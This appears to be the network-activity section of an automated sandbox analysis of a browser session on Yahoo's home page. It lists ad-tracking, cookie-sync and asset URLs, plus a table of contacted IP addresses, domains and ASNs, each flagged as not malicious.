                                                                                                                                                                                                                                                  https://www.yahoo.com/caas/content/article/?uuid=12dfba99-00cf-4f01-ac78-06d6c0d07524,0468abf9-ac9d-470b-a17a-0abbf27eb007,1072b278-f788-45ae-9e2f-e1732f12bcde,1b31ce0a-38da-40ff-8bf8-df7bfd4c3b89,4d305d2a-95ac-41bb-b482-7f09ed368552,637e8837-4314-4f37-8ae7-414f1cd9b94f&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12sfalse
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://bh.contextweb.com/bh/rtset?pid=558511&ev=1&rurl=https%3A%2F%2Fce.lijit.com/merge?pid=49&3pid=%%VGUID%%&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1false
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://eb2.3lift.com/xuid?mid=3690&xuid=509c6705-84a6-4b00-a1f8-009a91c68181&dongle=3995&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://s.yimg.com/cv/apiv2/finance/fonts/GT-America-Condensed-Bold.woff2false
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://id.rlcdn.com/709996.giffalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://finance.yahoo.com/assets/_app/immutable/chunks/TopicPill.DFWIHl7d.jsfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://pbs.yahoo.com/setuid?bidder=pubmatic&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=b&uid=0E953B97-4F55-458F-AF4A-D3EA6DD13C81false
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                https://eb2.3lift.com/xuid?mid=5989&xuid=CAESEB2SkYiSbe-aqVUfwvfPt4Q&dongle=c627&gdpr=0&gdpr_consent=&google_cver=1false
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  https://us-u.openx.net/w/1.0/sd?id=537072399&val=6863456619421248072false
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://s0.2mdn.net/creatives/assets/4309308/gwd3dmodelviewer_min.jsfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      https://finance.yahoo.com/assets/_app/immutable/assets/Tooltip.IRw8ojlh.cssfalse
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        https://id.rlcdn.com/1000.gif?memo=CPaqHBIvCisIARCUaxokYmUyNDc5YTUtZTc3YS0wNWQ4LTI4MjgtMDYzMTc2YjI2NWMwEAAaDQiZiZa4BhIFCOgHEABCAEoAfalse
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          https://tpsc-ew1.doubleverify.com/event.png?impid=1aa7021e668545b1a2ca5957a51c3abc&akipv6=&dup=&eoid=1000false
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            https://finance.yahoo.com/assets/_app/immutable/chunks/MarketsNavBar.raoHGTxi.jsfalse
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              https://finance.yahoo.com/assets/_app/immutable/chunks/index.C_UqkgE3.jsfalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                https://finance.yahoo.com/assets/_app/immutable/assets/Typography.CaSb88v6.cssfalse
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  https://sync.srv.stackadapt.com/sync?nid=1&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                    https://ups.analytics.yahoo.com/ups/58739/cms?partner_id=BLKAI&orig=onofalse
                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                      https://s.yimg.com/aaq/vzm/cs_1.6.6.jsfalse
                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                        https://finance.yahoo.com/assets/_app/immutable/chunks/loadRecentlyViewedTickers.Dccchr8e.jsfalse
                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                          https://finance.yahoo.com/assets/_app/immutable/chunks/server.CGBHKPKz.jsfalse
                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                            https://finance.yahoo.com/markets/crypto/all/true
                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                              https://widget.us.criteo.com/dis/usersync.aspx?r=55&p=104&cp=yieldmo&cu=1&url=https%3A%2F%2Fads.yieldmo.com%2Fv000%2Fsync%3Fpn_id%3Dcriteo%26id%3D%40%40CRITEO_USERID%40%40false
                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                https://geo.yahoo.com/p?s=2023538075&t=F6AhnNkpvvQd4F0v,0.6797204318366001&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fortkn.lovationyme.com%2F&_P=3.54.3%05_a1s%03d%3DAQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA%26S%3DAQAAAhO9NiTLyx3fDDQ91K20Q1o%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03rocket_GA_desk_test-3-v1%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%0364cMu7vCuRPRAnJf%04_w%03www.yahoo.com%2F%04_rid%031fkbtbdjgb12s%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQRQSVBDAgQAwrk2AwQAJYXrBAQAwBkeBQQBeOibBwQAI9JHCAQBZW_R%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031728414871%04A_prems%03337%04_E%03dwell%04_ts%031728414871%04_ms%03431%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                  https://sync.a-mo.net/setuid?A=68d32af8-495d-4c33-841d-b59b90ac7b1d&bidder=pubmatic&uid=0E953B97-4F55-458F-AF4A-D3EA6DD13C81false
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    https://s.yimg.com/aaq/wf/wf-benji-1.2.0-modern.jsfalse
                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                      https://match.prod.bidr.io/cookie-sync?gdpr=0&bee_sync_partners=sas%2Cpm&bee_sync_current_partner=pp&bee_sync_initiator=adx&bee_sync_hop_count=2&ev=AAEjY07OCwkAABUwZCAFkQ&pid=558502&do=add&gdpr=0false
                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                        https://ch-trc-events.taboola.com/yahoo-home/log/3/social?route=US:CH:V&tvi50=-50&lti=trecs&ri=f379f81c4a5bb1798375f4b7a535b500&sd=v2_4e609492ff55b48084743843e072bd5f_2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9_1728414825_1728414825_CIi3jgYQm9teGMDotOymMiABKAEw4QE4kaQOQPzYD0iry9kDUOoEWABgAGiOuMvY8NrPu1twAYABAA&ui=2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9&pi=/&wi=-2162821594718986386&pt=home&vi=1728414823488&st=social-available&d=%7B%22data%22%3A%5B%7B%22i%22%3A%22ctx%22%2C%22ism%22%3Afalse%2C%22srx%22%3A1280%2C%22sry%22%3A1024%2C%22pd%22%3Anull%2C%22tpl%22%3A%22%22%2C%22url%22%3A%22https%3A%2F%2Fwww.yahoo.com%22%2C%22rref%22%3A%22https%3A%2F%2Fortkn.lovationyme.com%2F%22%2C%22sref%22%3A%22https%3A%2F%2Fortkn.lovationyme.com%2F%22%2C%22hdl%22%3A%22Yahoo%20%7C%20Mail%2C%20Weather%2C%20Search%2C%20Politics%2C%20News%2C%20Finance%2C%20Sports%20%26%20Videos%22%2C%22sec%22%3A%22%22%2C%22aut%22%3A%5B%5D%2C%22img%22%3A%22https%3A%2F%2Fs.yimg.com%2Fcv%2Fapiv2%2Fsocial%2Fimages%2Fyahoo_default_logo.png%22%2C%22v%22%3A15%2C%22pw%22%3Afalse%7D%5D%7D&tim=15%3A13%3A51.896&id=5417&llvl=2&cv=20241006-3-RELEASE&false
                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                          https://noa.yahoo.com/p?s=2023538075&t=1728414861293&_I=&_AO=0&_NOL=0&etrg=backgroundPost&outcm=gamDebug&src=unknown&site=fp&partner=none&lang=en-US&region=US&device=desktop&colo=bf1&bucket=rocket_GA_desk_test-3-v1%2Cseamless&rid=1fkbtbdjgb12s&limitedAds=false&NPA=false&pd=unknown&pt=home&usercountry=US&benjiVersion=2.1.133&prebidVersion=8.51.0&yahooPrebidVersion=2.0.33&logType=INFO&message=LI_MODULE_LOADED&source=PREBID%3ALIVEINTENTfalse
                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                            https://geo.yahoo.com/p?s=2023538075&t=zaA3FunGQPCQZtPQ,0.10524154902380456&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fortkn.lovationyme.com%2F&_P=3.54.3%05_a1s%03d%3DAQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA%26S%3DAQAAAhO9NiTLyx3fDDQ91K20Q1o%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03rocket_GA_desk_test-3-v1%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%0364cMu7vCuRPRAnJf%04_w%03www.yahoo.com%2F%04_rid%031fkbtbdjgb12s%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQRQSVBDAgQAwrk2AwQAJYXrBAQAwBkeBQQBeOibBwQAI9JHCAQBZW_R%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031728414869%04A_prems%03318%04_E%03dwell%04_ts%031728414869%04_ms%03404%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                              https://vidanalytics.taboola.com/putes/mboxfalse
                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                https://s0.2mdn.net/sadbundle/3895761895101862695/Q3FY25_AURA_AWARENESS_COMPETITIVE_GEMINI_728x90/poster.jpgfalse
                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                  https://x.bidswitch.net/sync?ssp=adaptmx&user_id=68d32af8-495d-4c33-841d-b59b90ac7b1d&gdpr=0&gdpr_consent=&us_privacy=&gpp=&gpp_sid=false
                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                    https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&p=360&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpubmatic%26google_hm%3D%23%23B64_PM_UID%26gdpr%3DPM_GDPR%26gdpr_consent%3DPM_CONSENTfalse
                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                      https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=41800903&p=137711&s=137812&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNNfalse
                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                        https://rtb.gumgum.com/usync/prbds2s?gdpr=0&gdpr_consent=&us_privacy=&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dgumgum%26gdpr%3D0%26gdpr_consent%3D%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3Dfalse
                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                          https://s.yimg.com/ss/analytics-3.54.3.jsfalse
                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                            https://bh.contextweb.com/bh/rtset?ev=AAEjY07OCwkAABUwZCAFkQ&do=add&pid=558502&rurl=https%3A%2F%2Fmatch.prod.bidr.io%2Fcookie-sync%3Fgdpr%3D0%26bee_sync_partners%3Dsas%252Cpm%26bee_sync_current_partner%3Dpp%26bee_sync_initiator%3Dadx%26bee_sync_hop_count%3D2&gdpr=0false
                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                              https://www.temu.com/api/adx/cm/pixel?google_gid=CAESEK3wBaX2kN-gGRKG03MFPKI&google_cver=1&google_push=AXcoOmQgp3xvRYOLEhD9nyTz5XbYbToRlpMwFtc9k2yAyDkVVUcuUkZeDZBN7eIwyn3y92FjRXkBk1-mMlna6pVTuNuGrDpQ5tmDOQfalse
                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                https://sync.1rx.io/usersync2/rubicon?gdpr=0&us_privacy=1YNNfalse
                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                  https://t.adx.opera.com/pub/sync?pubid=pub11169426274368&coppa=&us_privacy=false
                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                    https://contextual.media.net/cksync.php?cs=8&vsid=3714164676390569000V10&type=33x&refUrl=&vid=84148664623714164676390569000V10&axid_e=&ovsid=212827289510156false
                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                      https://ups.analytics.yahoo.com/ups/58834/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNNfalse
                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                        https://ce.lijit.com/merge?pid=71&3pid=0E953B97-4F55-458F-AF4A-D3EA6DD13C81false
                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                          https://tsdtocl.com/false
                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                            https://finance.yahoo.com/assets/_app/immutable/chunks/loadTrendingTickers.BmFT6E7u.jsfalse
                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                              https://finance.yahoo.com/assets/_app/immutable/chunks/chevron_left.CltsmSmq.jsfalse
                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                https://us-u.openx.net/w/1.0/pd?plm=6&ph=c2321ff9-d50d-4965-896f-6a7eb778bfb5false
                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                  https://cms.quantserve.com/pixel/p-Z8PuJEk6U7Hyq.gif?idmatch=0&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1false
                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                    https://x.bidswitch.net/ul_cb/sync?ssp=adaptmx&user_id=68d32af8-495d-4c33-841d-b59b90ac7b1d&gdpr=0&gdpr_consent=&us_privacy=&gpp=&gpp_sid=false
                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                      https://s2.coinmarketcap.com/static/img/coins/64x64/3408.pngfalse
                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                        https://rtb.adentifi.com/CookieSyncTripleLift?gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                          https://dsum-sec.casalemedia.com/rum?cm_dsp_id=4&external_user_id=4155905375263972214false
                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                            https://tlx.3lift.com/header/auction?lib=prebid&v=8.51.0&referrer=https%3A%2F%2Fwww.yahoo.com%2F&tmax=2000&gdpr=falsefalse
                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                              https://sync.ipredictive.com/d/sync/cookie/generic?https://eb2.3lift.com/xuid?mid=3702&xuid=${ADELPHIC_CUID}&dongle=d54f&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                https://finance.yahoo.com/assets/_app/immutable/chunks/utils.QCnxU1jw.jsfalse
                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                                                                                                  https://cm.g.doubleclick.net/pixel?google_nid=gumgum_dbm&google_hm=ZV8zZGY5ZTI0MS1mMmYzLTQxOTQtODQwZchromecache_1335.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                    http://s0.2mdn.net/ads/studio/close.pngchromecache_722.2.dr, chromecache_1251.2.dr, chromecache_1275.2.dr, chromecache_1216.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                      https://www.noaa.gov/news-release/noaa-predicts-above-normal-2024-atlantic-hurricane-seasonchromecache_1586.2.dr, chromecache_1163.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                        https://www.twz.com/sea/chinas-new-aircraft-carrier-pulls-away-from-its-pier-ahead-of-sea-trialschromecache_1586.2.dr, chromecache_1163.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                          https://s.yimg.com/ny/api/res/1.2/x_gx8NkiKLYjyzPAzdu5Jw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTEyNDI7aD04Mjg-/chromecache_876.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                            https://s0.2mdn.net/creatives/assets/4908407/2024_XT4_Colorizer_CrystalWhiteTricoat_300x250.jpgchromecache_1517.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                              https://twitter.com/horobeyo/status/1841696456346145278?ref_src=twsrc%5Etfwchromecache_1586.2.dr, chromecache_1163.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                https://www.engadget.com/the-best-amazon-prime-day-early-deals-we-could-find-from-apple-anker-and-mochromecache_862.2.dr, chromecache_901.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                  https://s0.2mdn.net/ads/richmedia/studio/23579273/23579273_20200917084522920_Cadillac_3DModel_Intro_chromecache_1517.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                                    https://s.yimg.com/ny/api/res/1.2/Xi2FPtjlPbNk_qzv6tnVpQ--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTEzMjM-/chromecache_876.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                                      https://cm.g.doubleclick.net/pixel?google_nid=openx&google_cm&google_dbm&gdpr=0chromecache_779.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                                        https://s.yimg.com/ny/api/res/1.2/14mo8qIJrLOy5XrnaEU5kg--/YXBwaWQ9aGlnaGxhbmRlcjt3PTI0MDA7aD0xMzUwOchromecache_1586.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                                          https://sync.1rx.io/usersync2/pubmatic&gdpr=0&gdpr_consent=chromecache_977.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                                            https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=232chromecache_1522.2.dr, chromecache_1123.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                                              https://www.youtube.com/watch?v=NLhxcyzXQxMchromecache_1163.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                                https://s.yimg.com/ny/api/res/1.2/wH5i.oghmaALb4yrrdJtJw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTIwNDg7aD0xNDI0/chromecache_1163.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                                  https://s.yimg.com/ny/api/res/1.2/1VH_WFbayTYW4AXjhsF45g--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTUwNDtjZchromecache_1144.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                                                    http://cdn.taboola.com/libtrc/static/thumbnails/f70bb0c70705eff4b1157652d764e89c.jpgchromecache_732.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                                                      https://i.liadm.com/s/31327?bidder_id=14481&amp;bidder_uuid=ZwWEk9HM54wAAGq0ANAUBAAA%261449&amp;gpdrchromecache_1291.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                                                        https://s.yimg.com/ny/api/res/1.2/M3UNpF8E4Ugtd0SE22itMg--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTY0MA--/chromecache_1163.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                                                          https://s.yimg.com/ny/api/res/1.2/58YwfpNVLHqoTMvD1aTjbg--/YXBwaWQ9aGlnaGxhbmRlcjt3PTEyNDI7aD04Mjg-/chromecache_1163.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                                                            https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&siteId=us-lifestyle&chromecache_901.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                                                              https://cms.quantserve.com/pixel/p-Z8PuJEk6U7Hyq.gif?idmatch=0&amp;us_privacy=1YNN&amp;gpp=DBAA&amp;chromecache_1291.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                                                https://s.yimg.com/nn/img/sad-panda-201402200631.png)chromecache_1288.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                                                                  91.228.74.200
                                                                                                                                                                                                                                                                                                                                                                                                                  global.px.quantserve.comUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  27281QUANTCASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  74.6.160.107
                                                                                                                                                                                                                                                                                                                                                                                                                  dns-aup3nb5p0.sombrero.yahoo.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  185.89.210.153
                                                                                                                                                                                                                                                                                                                                                                                                                  ib.anycast.adnxs.comGermany
                                                                                                                                                                                                                                                                                                                                                                                                                  29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  74.6.160.106
                                                                                                                                                                                                                                                                                                                                                                                                                  ral248z7j.wc.06yahoo.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  34.95.69.49
                                                                                                                                                                                                                                                                                                                                                                                                                  i.clean.ggUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  34.160.236.64
                                                                                                                                                                                                                                                                                                                                                                                                                  tagr-pixel-nginx-odr-euw4.mookie1.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  212.82.100.137
                                                                                                                                                                                                                                                                                                                                                                                                                  ds-global3.l7.search.ystg1.b.yahoo.comUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  34010YAHOO-IRDGBfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  198.47.127.205
                                                                                                                                                                                                                                                                                                                                                                                                                  pug-ams-bc.pubmnet.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  65.9.66.102
                                                                                                                                                                                                                                                                                                                                                                                                                  live.rezync.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.71.131.137
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  237MERIT-AS-14USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  151.101.193.44
                                                                                                                                                                                                                                                                                                                                                                                                                  tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.214.199.88
                                                                                                                                                                                                                                                                                                                                                                                                                  dorpat.geo.iponweb.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  19527GOOGLE-2USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.72.171.191
                                                                                                                                                                                                                                                                                                                                                                                                                  cdn.w55c.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  121.127.42.98
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownAfghanistan
                                                                                                                                                                                                                                                                                                                                                                                                                  55732RANATECHNET-AFRANATechnologiesKabulAFfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.196.164.227
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  151.101.1.44
                                                                                                                                                                                                                                                                                                                                                                                                                  tsdtocl.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  107.178.254.65
                                                                                                                                                                                                                                                                                                                                                                                                                  pippio.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownReserved
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownunknownfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  108.139.243.74
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.171.90.66
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  151.101.65.44
                                                                                                                                                                                                                                                                                                                                                                                                                  dualstack.tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  142.250.185.230
                                                                                                                                                                                                                                                                                                                                                                                                                  ad.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  134.122.57.34
                                                                                                                                                                                                                                                                                                                                                                                                                  match.adsby.bidtheatre.comUnited States
